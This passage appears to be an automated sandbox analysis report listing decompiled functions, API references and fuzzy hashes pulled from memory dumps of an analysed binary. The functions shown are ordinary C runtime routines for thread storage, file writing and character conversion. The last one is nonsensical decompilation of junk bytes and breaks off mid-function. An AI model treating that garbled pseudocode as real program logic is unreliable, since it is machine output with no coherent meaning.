                                                                                                                                                      • Instruction ID: 951521e5306c9743b1bbe3f12aef3e554a535aac35f3b270d8b20651ae45f907
                                                                                                                                                      • Opcode Fuzzy Hash: fdb27461bc161449168f726a47084b6a473ccc3699775058bb529457060b94c2
                                                                                                                                                      • Instruction Fuzzy Hash: 31F0A972205214BF9240EB59DD84D7FB7ECEFCDAA5B004519F648D3210C731AD058BBA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                      			E1000EA65(void* __ebx, void* __edi) {
                                                                                                                                                      
                                                                                                                                                      				E100130A0();
                                                                                                                                                      				if(E100148B1(1, 0x214) != __edi) {
                                                                                                                                                      					_push(__esi);
                                                                                                                                                      					_push( *0x10332c68);
                                                                                                                                                      					__eax = E10013034( *0x10333820);
                                                                                                                                                      					__eflags = __eax;
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						_push(__esi);
                                                                                                                                                      						__eax = E1000CA30(__ebx, __edi, __esi, __eflags);
                                                                                                                                                      						goto L1;
                                                                                                                                                      					} else {
                                                                                                                                                      						_push(__edi);
                                                                                                                                                      						_push(__esi);
                                                                                                                                                      						__eax = E10013107(__ebx, __edi, __esi, __eflags);
                                                                                                                                                      						__eax = GetCurrentThreadId();
                                                                                                                                                      						__esi[1] = __esi[1] | 0xffffffff;
                                                                                                                                                      						 *__esi = __eax;
                                                                                                                                                      						0 = 1;
                                                                                                                                                      						__eflags = 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return 0;
                                                                                                                                                      			}




                                                                                                                                                      APIs
                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 1000EA65
                                                                                                                                                        • Part of subcall function 100130A0: TlsGetValue.KERNEL32(100131CA), ref: 100130A6
                                                                                                                                                        • Part of subcall function 100130A0: __decode_pointer.LIBCMT ref: 100130B6
                                                                                                                                                        • Part of subcall function 100130A0: TlsSetValue.KERNEL32(00000000), ref: 100130C3
                                                                                                                                                      • __calloc_crt.LIBCMT ref: 1000EA71
                                                                                                                                                        • Part of subcall function 100148B1: __calloc_impl.LIBCMT ref: 100148BF
                                                                                                                                                        • Part of subcall function 100148B1: Sleep.KERNEL32(00000000,100131F0,00000001,00000214), ref: 100148D6
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 1000EA8F
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240), ref: 10013041
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(00000005,?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001), ref: 10013058
                                                                                                                                                      • __initptd.LIBCMT ref: 1000EA9D
                                                                                                                                                        • Part of subcall function 10013107: GetModuleHandleA.KERNEL32(KERNEL32.DLL,10330340,0000000C,10013219,00000000,00000000), ref: 10013118
                                                                                                                                                        • Part of subcall function 10013107: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10013141
                                                                                                                                                        • Part of subcall function 10013107: GetProcAddress.KERNEL32(?,DecodePointer), ref: 10013151
                                                                                                                                                        • Part of subcall function 10013107: InterlockedIncrement.KERNEL32(10332650), ref: 10013173
                                                                                                                                                        • Part of subcall function 10013107: ___addlocaleref.LIBCMT ref: 1001319A
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1000EAA4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1662683381-0
                                                                                                                                                      • Opcode ID: d30fb72e8bc76df9a33aede914a2a08a3dca29834d0d6b313e301109ddb285b0
                                                                                                                                                      • Instruction ID: d37afd26d2eadf3ef50fe9e24c1f066afac95630afcebaca695182ecfc570b21
                                                                                                                                                      • Opcode Fuzzy Hash: d30fb72e8bc76df9a33aede914a2a08a3dca29834d0d6b313e301109ddb285b0
                                                                                                                                                      • Instruction Fuzzy Hash: 62F027373042A1ADF235F774AC4294E37C4EB8A3F1730892AF552EC0E5EE21E8808261
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E00406BC0(void* __ebx, void* __ecx, void* __edx) {
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void _t10;
                                                                                                                                                      				void* _t12;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				long _t18;
                                                                                                                                                      				void* _t19;
                                                                                                                                                      
                                                                                                                                                      				_t17 = __edx;
                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                      				_t18 = GetLastError();
                                                                                                                                                      				_t19 = TlsGetValue( *0x40f9fc);
                                                                                                                                                      				if(_t19 == 0) {
                                                                                                                                                      					_t19 = E00408C2B(_t12, 1, 0x74);
                                                                                                                                                      					if(_t19 == 0 || TlsSetValue( *0x40f9fc, _t19) == 0) {
                                                                                                                                                      						_push(0x10);
                                                                                                                                                      						E00403CCB(_t17, _t19);
                                                                                                                                                      					} else {
                                                                                                                                                      						E00406BAD(_t19);
                                                                                                                                                      						_t10 = GetCurrentThreadId();
                                                                                                                                                      						 *(_t19 + 4) =  *(_t19 + 4) | 0xffffffff;
                                                                                                                                                      						 *_t19 = _t10;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				SetLastError(_t18);
                                                                                                                                                      				return _t19;
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(?,?,004063A0), ref: 00406BC2
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,004063A0), ref: 00406BD0
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,004063A0), ref: 00406C1C
                                                                                                                                                        • Part of subcall function 00408C2B: HeapAlloc.KERNEL32(00000008,?,00000000,00000000), ref: 00408D21
                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,004063A0), ref: 00406BF4
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00406C05
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2020098873-0
                                                                                                                                                      • Opcode ID: 851aaa287e66f3f2a569adf214d11eaa7bce3c3a8ed0d30959d25bc31ff2cb26
                                                                                                                                                      • Instruction ID: 2403d90e008a7af22ec6c7de5fb275aeee1f8d1f1e2512a8fb4e243af935bce0
                                                                                                                                                      • Opcode Fuzzy Hash: 851aaa287e66f3f2a569adf214d11eaa7bce3c3a8ed0d30959d25bc31ff2cb26
                                                                                                                                                      • Instruction Fuzzy Hash: D4F0F6325056119BE7312B30BE0975B3A64EF41771711053AFAD2FA2D1DB388C418ADC
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __aulldiv__aullrem
                                                                                                                                                      • String ID: $9
                                                                                                                                                      • API String ID: 3839614884-1776416348
                                                                                                                                                      • Opcode ID: d6dacab73d4cfa54ea8b20ef37b8a06407e77a214102cd57d9a2bb1cbe5c3d40
                                                                                                                                                      • Instruction ID: e0dcd54c5c3e887c7f10d5284822680c003a79e82bb73371b6c8bcf29293307e
                                                                                                                                                      • Opcode Fuzzy Hash: d6dacab73d4cfa54ea8b20ef37b8a06407e77a214102cd57d9a2bb1cbe5c3d40
                                                                                                                                                      • Instruction Fuzzy Hash: 5C516CB2D00219AFDF11DFD8CC45BEEBBB8EF44354F144066EA10B6292D3399A45CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                      			E004046E3() {
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed long long _v20;
                                                                                                                                                      				signed long long _v28;
                                                                                                                                                      				void* _t10;
                                                                                                                                                      				struct HINSTANCE__* _t19;
                                                                                                                                                      
                                                                                                                                                      				_t19 = GetModuleHandleA("KERNEL32");
                                                                                                                                                      				if(_t19 == 0) {
                                                                                                                                                      					L6:
                                                                                                                                                      					_v12 =  *0x40b2d8;
                                                                                                                                                      					_v20 =  *0x40b2d0;
                                                                                                                                                      					asm("fsubr qword [ebp-0x10]");
                                                                                                                                                      					_v28 = _v20 / _v12 * _v12;
                                                                                                                                                      					asm("fcomp qword [0x40b210]");
                                                                                                                                                      					asm("fnstsw ax");
                                                                                                                                                      					asm("sahf");
                                                                                                                                                      					if(_t19 <= 0) {
                                                                                                                                                      						return 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t10 = 1;
                                                                                                                                                      						return _t10;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                      					if(__eax == 0) {
                                                                                                                                                      						goto L6;
                                                                                                                                                      					} else {
                                                                                                                                                      						_push(0);
                                                                                                                                                      						return __eax;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040372C), ref: 004046E8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004046F8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                                      • Opcode ID: a0086044393bef25fea17c484496c129d2195bd65af643a0966d1da9d9ad48a6
                                                                                                                                                      • Instruction ID: 70ff292064885587df23f269df437abca73237b64940ec06351548063b4fbea1
                                                                                                                                                      • Opcode Fuzzy Hash: a0086044393bef25fea17c484496c129d2195bd65af643a0966d1da9d9ad48a6
                                                                                                                                                      • Instruction Fuzzy Hash: 9FC012A0341301A6E91017B24C4EB2B2544EB81B41F14087AA115F11C0DB7CD000546D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406EF0(long _a4, void* _a8, long _a12) {
                                                                                                                                                      				intOrPtr* _v8;
                                                                                                                                                      				long _v12;
                                                                                                                                                      				long _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				void _v1048;
                                                                                                                                                      				void** _t66;
                                                                                                                                                      				signed int _t67;
                                                                                                                                                      				intOrPtr _t69;
                                                                                                                                                      				signed int _t70;
                                                                                                                                                      				intOrPtr _t71;
                                                                                                                                                      				signed int _t73;
                                                                                                                                                      				signed int _t80;
                                                                                                                                                      				int _t85;
                                                                                                                                                      				long _t87;
                                                                                                                                                      				intOrPtr* _t91;
                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                      				struct _OVERLAPPED* _t101;
                                                                                                                                                      				long _t103;
                                                                                                                                                      				signed int _t105;
                                                                                                                                                      				struct _OVERLAPPED* _t106;
                                                                                                                                                      
                                                                                                                                                      				_t101 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				if(_a12 != 0) {
                                                                                                                                                      					_t91 = 0x411d60 + (_a4 >> 5) * 4;
                                                                                                                                                      					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
                                                                                                                                                      					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						E00406E18(__eflags, _a4, 0, 2);
                                                                                                                                                      					}
                                                                                                                                                      					_t66 =  *_t91 + _t105;
                                                                                                                                                      					__eflags = _t66[1] & 0x00000080;
                                                                                                                                                      					if((_t66[1] & 0x00000080) == 0) {
                                                                                                                                                      						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
                                                                                                                                                      						__eflags = _t67;
                                                                                                                                                      						if(_t67 == 0) {
                                                                                                                                                      							_a4 = GetLastError();
                                                                                                                                                      						} else {
                                                                                                                                                      							_a4 = _t101;
                                                                                                                                                      							_v12 = _v16;
                                                                                                                                                      						}
                                                                                                                                                      						L15:
                                                                                                                                                      						_t69 = _v12;
                                                                                                                                                      						__eflags = _t69 - _t101;
                                                                                                                                                      						if(_t69 != _t101) {
                                                                                                                                                      							_t70 = _t69 - _v20;
                                                                                                                                                      							__eflags = _t70;
                                                                                                                                                      							return _t70;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _a4 - _t101;
                                                                                                                                                      						if(_a4 == _t101) {
                                                                                                                                                      							L25:
                                                                                                                                                      							_t71 =  *_t91;
                                                                                                                                                      							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
                                                                                                                                                      							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
                                                                                                                                                      								L27:
                                                                                                                                                      								 *((intOrPtr*)(E004087E3())) = 0x1c;
                                                                                                                                                      								_t73 = E004087EC();
                                                                                                                                                      								 *_t73 = _t101;
                                                                                                                                                      								L24:
                                                                                                                                                      								return _t73 | 0xffffffff;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *_a8 - 0x1a;
                                                                                                                                                      							if( *_a8 == 0x1a) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L27;
                                                                                                                                                      						}
                                                                                                                                                      						_t106 = 5;
                                                                                                                                                      						__eflags = _a4 - _t106;
                                                                                                                                                      						if(_a4 != _t106) {
                                                                                                                                                      							_t73 = E00408770(_a4);
                                                                                                                                                      						} else {
                                                                                                                                                      							 *((intOrPtr*)(E004087E3())) = 9;
                                                                                                                                                      							_t73 = E004087EC();
                                                                                                                                                      							 *_t73 = _t106;
                                                                                                                                                      						}
                                                                                                                                                      						goto L24;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags = _a12 - _t101;
                                                                                                                                                      					_v8 = _a8;
                                                                                                                                                      					_a4 = _t101;
                                                                                                                                                      					if(_a12 <= _t101) {
                                                                                                                                                      						goto L25;
                                                                                                                                                      					} else {
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      					do {
                                                                                                                                                      						L6:
                                                                                                                                                      						_t80 =  &_v1048;
                                                                                                                                                      						do {
                                                                                                                                                      							__eflags = _v8 - _a8 - _a12;
                                                                                                                                                      							if(_v8 - _a8 >= _a12) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_v8 = _v8 + 1;
                                                                                                                                                      							_t97 =  *_v8;
                                                                                                                                                      							__eflags = _t97 - 0xa;
                                                                                                                                                      							if(_t97 == 0xa) {
                                                                                                                                                      								_v20 = _v20 + 1;
                                                                                                                                                      								 *_t80 = 0xd;
                                                                                                                                                      								_t80 = _t80 + 1;
                                                                                                                                                      								__eflags = _t80;
                                                                                                                                                      							}
                                                                                                                                                      							 *_t80 = _t97;
                                                                                                                                                      							_t80 = _t80 + 1;
                                                                                                                                                      							__eflags = _t80 -  &_v1048 - 0x400;
                                                                                                                                                      						} while (_t80 -  &_v1048 < 0x400);
                                                                                                                                                      						_t103 = _t80 -  &_v1048;
                                                                                                                                                      						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
                                                                                                                                                      						__eflags = _t85;
                                                                                                                                                      						if(_t85 == 0) {
                                                                                                                                                      							_a4 = GetLastError();
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t87 = _v16;
                                                                                                                                                      						_v12 = _v12 + _t87;
                                                                                                                                                      						__eflags = _t87 - _t103;
                                                                                                                                                      						if(_t87 < _t103) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _v8 - _a8 - _a12;
                                                                                                                                                      					} while (_v8 - _a8 < _a12);
                                                                                                                                                      					_t101 = 0;
                                                                                                                                                      					__eflags = 0;
                                                                                                                                                      					goto L15;
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				return 0;
                                                                                                                                                      			}
























                                                                                                                                                      APIs
                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406FB7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                      • Opcode ID: e64617ffc67776a099c2fb0b7240a385518e7f0ffdc03b63cbfcd62c863cf82a
                                                                                                                                                      • Instruction ID: 27cf5cec958d878707709140bf2fb96cf6b521a630f13871181a3c8bb6886863
                                                                                                                                                      • Opcode Fuzzy Hash: e64617ffc67776a099c2fb0b7240a385518e7f0ffdc03b63cbfcd62c863cf82a
                                                                                                                                                      • Instruction Fuzzy Hash: 9151D371904209EFCB11CF68CD80A9E7BB5FF45340F2181BAE916EB291D734EA50CB69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001815A(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				char _v20;
                                                                                                                                                      				char _t43;
                                                                                                                                                      				char _t46;
                                                                                                                                                      				signed int _t53;
                                                                                                                                                      				signed int _t54;
                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                      				intOrPtr _t57;
                                                                                                                                                      				int _t58;
                                                                                                                                                      				signed short* _t59;
                                                                                                                                                      				short* _t60;
                                                                                                                                                      				int _t65;
                                                                                                                                                      				char* _t72;
                                                                                                                                                      
                                                                                                                                                      				_t72 = _a8;
                                                                                                                                                      				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                      					L5:
                                                                                                                                                      					return 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					if( *_t72 != 0) {
                                                                                                                                                      						E1000D4F5( &_v20, __edi, _a16);
                                                                                                                                                      						_t43 = _v20;
                                                                                                                                                      						__eflags =  *(_t43 + 0x14);
                                                                                                                                                      						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                      							_t46 = E10013A1A( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                      							if(_t46 == 0) {
                                                                                                                                                      								__eflags = _a4;
                                                                                                                                                      								_t40 = _v20 + 4; // 0x840ffff8
                                                                                                                                                      								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									L10:
                                                                                                                                                      									__eflags = _v8;
                                                                                                                                                      									if(_v8 != 0) {
                                                                                                                                                      										_t53 = _v12;
                                                                                                                                                      										_t11 = _t53 + 0x70;
                                                                                                                                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                      										__eflags =  *_t11;
                                                                                                                                                      									}
                                                                                                                                                      									return 1;
                                                                                                                                                      								}
                                                                                                                                                      								L21:
                                                                                                                                                      								_t54 = E1000F720(__eflags);
                                                                                                                                                      								 *_t54 = 0x2a;
                                                                                                                                                      								__eflags = _v8;
                                                                                                                                                      								if(_v8 != 0) {
                                                                                                                                                      									_t54 = _v12;
                                                                                                                                                      									_t33 = _t54 + 0x70;
                                                                                                                                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                      									__eflags =  *_t33;
                                                                                                                                                      								}
                                                                                                                                                      								return _t54 | 0xffffffff;
                                                                                                                                                      							}
                                                                                                                                                      							_t56 = _v20;
                                                                                                                                                      							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                      							_t65 =  *_t15;
                                                                                                                                                      							__eflags = _t65 - 1;
                                                                                                                                                      							if(_t65 <= 1) {
                                                                                                                                                      								L17:
                                                                                                                                                      								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                      								__eflags = _a12 -  *_t24;
                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                      									goto L21;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _t72[1];
                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                      									goto L21;
                                                                                                                                                      								}
                                                                                                                                                      								L19:
                                                                                                                                                      								__eflags = _v8;
                                                                                                                                                      								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                      								_t57 =  *_t27;
                                                                                                                                                      								if(_v8 == 0) {
                                                                                                                                                      									return _t57;
                                                                                                                                                      								}
                                                                                                                                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                      								return _t57;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a12 - _t65;
                                                                                                                                                      							if(_a12 < _t65) {
                                                                                                                                                      								goto L17;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a4;
                                                                                                                                                      							_t21 = _t56 + 4; // 0x840ffff8
                                                                                                                                                      							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                      							__eflags = _t58;
                                                                                                                                                      							_t56 = _v20;
                                                                                                                                                      							if(_t58 != 0) {
                                                                                                                                                      								goto L19;
                                                                                                                                                      							}
                                                                                                                                                      							goto L17;
                                                                                                                                                      						}
                                                                                                                                                      						_t59 = _a4;
                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                      							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                      						}
                                                                                                                                                      						goto L10;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t60 = _a4;
                                                                                                                                                      						if(_t60 != 0) {
                                                                                                                                                      							 *_t60 = 0;
                                                                                                                                                      						}
                                                                                                                                                      						goto L5;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}

















                                                                                                                                                      0x1001820f
                                                                                                                                                      0x10018215
                                                                                                                                                      0x10018183
                                                                                                                                                      0x10018183
                                                                                                                                                      0x1001821e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001821e
                                                                                                                                                      0x100181d7
                                                                                                                                                      0x100181da
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100181de
                                                                                                                                                      0x100181ec
                                                                                                                                                      0x100181ef
                                                                                                                                                      0x100181f5
                                                                                                                                                      0x100181f7
                                                                                                                                                      0x100181fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100181fa
                                                                                                                                                      0x10018197
                                                                                                                                                      0x1001819a
                                                                                                                                                      0x1001819c
                                                                                                                                                      0x100181a2
                                                                                                                                                      0x100181a2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018174
                                                                                                                                                      0x10018174
                                                                                                                                                      0x10018179
                                                                                                                                                      0x1001817b
                                                                                                                                                      0x1001817b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018179
                                                                                                                                                      0x10018172

                                                                                                                                                      APIs
                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1001818A
                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 100181BE
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 100181EF
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 1001825D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                      • Opcode ID: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                      • Instruction ID: 8c2b7c8d3196bbd4c2d7993dcbbe5c0e1781117acee873ad45468beb87eff19f
                                                                                                                                                      • Opcode Fuzzy Hash: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                      • Instruction Fuzzy Hash: 37318D32A04296FFEB11CFA4CC819AE7BE9FF02251F1585A9E4509F1A1D730DB81DB51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 27%
                                                                                                                                                      			E1000C9E0(intOrPtr* __eax, void* __edx, void* __edi) {
                                                                                                                                                      				intOrPtr* _t14;
                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                      				intOrPtr _t20;
                                                                                                                                                      				intOrPtr _t36;
                                                                                                                                                      				intOrPtr* _t38;
                                                                                                                                                      
                                                                                                                                                      				 *__eax =  *__eax + __edx;
                                                                                                                                                      				 *0xba =  *0xba + __edx;
                                                                                                                                                      				asm("rol dh, 0x0");
                                                                                                                                                      				asm("adc [edx+edi*4], ah");
                                                                                                                                                      				 *0xba =  *0xba + __edx;
                                                                                                                                                      				 *0x00000178 =  *((intOrPtr*)(0x178)) + __edx;
                                                                                                                                                      				asm("adc dl, al");
                                                                                                                                                      				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
                                                                                                                                                      				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
